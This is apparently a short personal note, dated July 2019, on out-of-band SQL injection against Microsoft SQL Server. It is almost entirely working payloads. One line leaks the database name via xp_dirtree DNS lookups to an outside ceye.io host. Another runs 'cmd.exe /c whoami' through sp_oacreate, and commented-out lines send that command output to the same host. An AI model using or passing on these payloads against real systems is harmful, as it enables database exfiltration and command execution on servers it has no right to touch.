mssql 无回显 注入
DECLARE @host varchar(128); SELECT @host=(select db_name())+ '.hfkzaq.ceye.io'; select @host; EXEC('master..xp_dirtree "\\'+@host+'\foobar$"');
declare @luan int,@exec int,@text int,@str varchar(8000); exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@luan output; --exec sp_oamethod @luan,'run',null,'calc.exe'; exec sp_oamethod @luan,'exec',@exec output,'c:\windows\system32\cmd.exe /c whoami'; exec sp_oamethod @exec, 'StdOut', @text out; exec sp_oamethod @text, 'readall', @str out select @str+'1'; --DECLARE @host varchar(128); --SELECT @host=@str+'.hfkzaq.ceye.io'; --DECLARE @ho2st varchar(128); --select @ho2st=Replace(@host,' ',''); --SELECT @ho2st; --EXEC('master..xp_dirtree "\\'+@host +'\foobar$"');
life
2019年7月16日 下午2:38
lifelife